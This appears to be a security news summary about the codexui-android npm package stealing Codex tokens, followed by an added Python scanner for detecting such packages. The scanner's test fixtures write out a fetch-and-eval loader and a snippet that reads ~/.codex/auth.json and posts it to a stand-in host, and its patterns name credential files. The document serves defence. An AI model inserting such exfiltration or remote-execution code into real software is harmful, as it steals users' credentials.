A popular npm package, codexui-android, secretly exfiltrated OpenAI Codex authentication tokens, researchers report. According to Aikido Security researcher Charlie Eriksen, the package amassed about 27,000 weekly downloads and, starting roughly a month after publication, every invocation began sending the contents of users' auth.json (Codex auth tokens) to an attacker-controlled endpoint, which the Aikido blog identifies as sentry.anyclaw.store. Cybernews reports that the package delivered genuine functionality and that the malicious code was pulled at runtime rather than being present in the GitHub repository, which allowed it to evade source audits and, Cybernews adds, to bypass Google Play pre-publication scans. The incident illustrates a supply-chain technique in which threat actors weaponize legitimate developer tools, according to the published researcher findings.
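The three behaviours the report describes (reading a credential file, fetching code at runtime so the repository looks clean, and posting to an unexpected host) can be triaged statically on the package as actually installed in node_modules, not on the GitHub source. The following Python scanner is an added example written for this summary; it is not Aikido's or Cybernews's tooling and not the real package. The heuristic patterns, the fixture file contents, the `.example.invalid` hosts and the allowlist are constructed assumptions; the only real indicator is the endpoint named above.

```python
"""
Heuristic static triage of an installed npm package for the pattern described
above: reading a credential file such as Codex's auth.json, executing code
fetched at runtime, and posting to an unexpected host. Heuristics, fixture
files and hosts are constructed for illustration (assumption), not the
researchers' tooling; the one real indicator is the endpoint from the report.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Set

# Endpoint named in the published findings; everything else below is constructed.
KNOWN_BAD_HOSTS = {"sentry.anyclaw.store"}

# Credential files a UI helper package has no reason to read.
CREDENTIAL_PATHS = [r"auth\.json", r"\.codex\b", r"\.npmrc\b", r"\.ssh\b"]

# Executing text obtained at runtime: the code never sits in the repo, so a source audit misses it.
DYNAMIC_EXEC = [
    r"\beval\s*\(",
    r"new\s+Function\s*\(",
    r"\bvm\.(?:runInThisContext|runInNewContext|Script)\s*\(",
]

# Outbound request primitives with a literal URL; the host is captured for allowlisting.
HTTP_CALL = re.compile(
    r"""(?:https?\.(?:request|get)|\bfetch|axios\.(?:post|get))\s*\(\s*['"`]https?://([^/'"`\s]+)""",
    re.IGNORECASE,
)


def scan_source(text: str, allowed_hosts: Set[str]) -> Dict[str, List[str]]:
    """Return the indicators matched in one JavaScript source text."""
    findings: Dict[str, List[str]] = {
        "credential_read": [], "dynamic_exec": [], "unexpected_host": [], "known_bad_host": [],
    }
    for pat in CREDENTIAL_PATHS:
        if re.search(pat, text):
            findings["credential_read"].append(pat)
    for pat in DYNAMIC_EXEC:
        if re.search(pat, text):
            findings["dynamic_exec"].append(pat)
    for host in HTTP_CALL.findall(text):
        host = host.lower()
        if host in KNOWN_BAD_HOSTS:
            findings["known_bad_host"].append(host)
        elif host not in allowed_hosts:
            findings["unexpected_host"].append(host)
    return findings


def classify(findings: Dict[str, List[str]]) -> str:
    """A credential read combined with an outbound channel or staged code is the exfil shape."""
    if findings["known_bad_host"]:
        return "high"
    if findings["credential_read"] and (findings["unexpected_host"] or findings["dynamic_exec"]):
        return "high"
    if findings["unexpected_host"] or findings["dynamic_exec"]:
        return "medium"
    if findings["credential_read"]:
        return "low"
    return "clean"


def scan_package(root: Path, allowed_hosts: Set[str]) -> Dict[str, str]:
    """Classify every JavaScript file under an installed package directory."""
    results: Dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if path.suffix in {".js", ".cjs", ".mjs"}:
            text = path.read_text(errors="replace")
            results[str(path.relative_to(root))] = classify(scan_source(text, allowed_hosts))
    return results


# Constructed fixtures standing in for package files; not code from the real package.
SAMPLE_BENIGN = "module.exports = (x) => x.toUpperCase();\n"
SAMPLE_LOADER = (
    "const r = await fetch('https://cdn.example.invalid/stage2.js');\n"
    "eval(await r.text());\n"
)
SAMPLE_EXFIL = (
    "const p = require('path').join(require('os').homedir(), '.codex', 'auth.json');\n"
    "const creds = require('fs').readFileSync(p, 'utf8');\n"
    "fetch('https://collector.example.invalid/v1', { method: 'POST', body: creds });\n"
)


def demo() -> Dict[str, str]:
    """Write the fixtures into a throwaway package tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "lib" / "format.js").write_text(SAMPLE_BENIGN)
        (root / "lib" / "telemetry.js").write_text(SAMPLE_LOADER)
        (root / "index.js").write_text(SAMPLE_EXFIL)
        return scan_package(root, allowed_hosts={"registry.npmjs.org"})


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:6} {name}")
```

Run it against a real install with `scan_package(Path("node_modules/<package>"), allowed_hosts)` where the allowlist holds the hosts the package legitimately talks to. The verdict is deliberately coarse: the loader fixture scores only "medium" because fetching and evaluating remote text is not proof of theft, while the fixture that reads auth.json and posts it scores "high". String-level heuristics miss obfuscated or concatenated paths, so treat a "medium" on a package that ships no network feature as a prompt to diff the published tarball against its repository rather than as a clean result.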